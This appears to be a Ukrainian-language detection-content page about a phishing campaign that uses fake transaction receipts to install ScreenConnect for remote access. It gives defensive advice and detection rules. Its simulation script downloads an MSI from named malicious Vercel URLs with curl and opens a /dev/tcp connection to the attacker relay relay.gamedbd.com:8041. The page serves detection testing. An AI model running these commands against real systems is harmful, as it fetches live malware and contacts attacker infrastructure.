Шахрайство з фішингом та зловмисним ПЗ: Фішингові електронні листи під виглядом квитанцій про транзакції
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники відправляють фішингові електронні листи, що видають себе за співробітників компаній США і містять вкладення, замасковані під квитанції про транзакцію. Атака використовує шкідливий PDF, щоб змусити користувачів завантажити нібито оновлення Adobe Flash Player, яке фактично запускає VBScript. Скрипт потім встановлює законний інструмент віддаленого управління ScreenConnect для встановлення постійного віддаленого доступу для подальший дій.
Розслідування
Центр безпеки AhnLab Security Intelligence Center (ASEC) ідентифікував кампанію шляхом аналізу вмісту фішингових електронних листів і поведінки вкладеного PDF. Розслідування відстежило ланцюг виконання від шкідливого VBScript до отримання фонових навантажень і тихого встановлення пакету MSI за допомогою curl.exe and msiexec.exe.
Захист
Користувачів слід навчити розпізнавати фішингові спроби, що стосуються неочікуваних квитанцій про транзакції та запитів на встановлення оновлень програмного забезпечення, таких як Adobe Flash Player. Організації повинні обмежити виконання VBScript і моніторити несанкціоноване використання засобів віддаленого управління, включаючи ScreenConnect. Білий список додатків також може допомогти запобігти виконанню невідомих або непідтверджених пакунків MSI.
Відповідь
Якщо виявлено шкідливу діяльність, уражена система повинна бути негайно ізольована, щоб запобігти віддаленому доступу через ScreenConnect. Респондентам слід завершити активні сесії, пов’язані з relay.Gamedbd.Com інфраструктурою та перевірити реєстр на предмет збереженої інформації про сесії. Повне судове розслідування також повинно визначити, чи відбулося бічне переміщення або ексфільтрація даних через інструмент віддаленого управління.
Потік атак
Ми ще оновлюємо цю частину.
Виявлення
LOLBAS WScript / CScript (через process_creation)
Альтернативне віддалене доступ / програмне забезпечення управління (через process_creation)
Можлива Інфільтрація/Ексфільтрація даних / C2 через сервіси сторонніх виробників / Інструменти (через proxy)
Можлива Інфільтрація/Ексфільтрація даних / C2 через сервіси сторонніх виробників / Інструменти (через dns)
IOC (HashMd5) для виявлення: Шкідливе програмне забезпечення Фішинг/Шахрайство: Фішингові електронні листи, замасковані під квитанції про транзакції
Виявлення фішингових електронних листів, замаскованих під квитанції про транзакції [Проксі]
Фішинговий електронний лист, що видає квитанцію про транзакцію, призводить до встановлення пакету MSI [Створення процесів у Windows]
Виконання симуляції
Передумова: Телеметрія та перевірка передзапуску повинна пройти.
Роз’яснення: У цій частині детально описується точне виконання техніки противника (TTP), розробленої для спричинення правила виявлення. Команди та нарратив ПОВИННІ безпосередньо відображати виявлені TTP і прагнути створити саме ту телеметрію, яку очікує логіка виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.
-
Сценарій атаки та команди: Противник починає фішингову кампанію, відправляючи електронний лист щодо невдалої транзакції. Посилання направляє жертву на
https://transaction-sucessful.vercel.app, де розміщене підроблене квитанція. Коли жертва натискає “Завантажити квитанцію”, браузер намагається отриматиhttps://payment-six-eta.vercel.app/doc/sc.msi. Після виконання навантаження він намагається встановити сесію віддаленого доступу шляхом підключення до ретранслятора ScreenConnect за адресоюrelay.gamedbd.com:8041. Ця послідовність перевіряє логіку виявлення як на основі URL, так і на основі домену/порту. -
Скрипт для регресійного тестування:
#!/bin/bash # Скрипт симуляції для спрацювання правила виявлення Phishing/ScreenConnect echo "[+] Початок симуляції: тест виявлення Phishing/ScreenConnect" # 1. Симулюйте завантаження шкідливого MSI з URL Vercel echo "[+] Крок 1: Симулювання підключення до шкідливого URL Vercel..." curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi" # 2. Симулюйте підключення до певного домену/порту реле ScreenConnect echo "[+] Крок 2: Симулювання підключення до шкідливого реле ScreenConnect..." # Ми використовуємо /dev/tcp, щоб симулювати спробу підключення без необхідності виклику реального слухача timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null echo "[+] Симуляцію завершено. Перевірте SIEM для отримання сповіщень." -
Команди очищення:
# Ця симуляція на базі мережі не створює постійних артефактів. # Якщо були завантажені будь-які локальні файли, їх слід видалити: rm -f sc.msi echo "[+] Очищення завершено."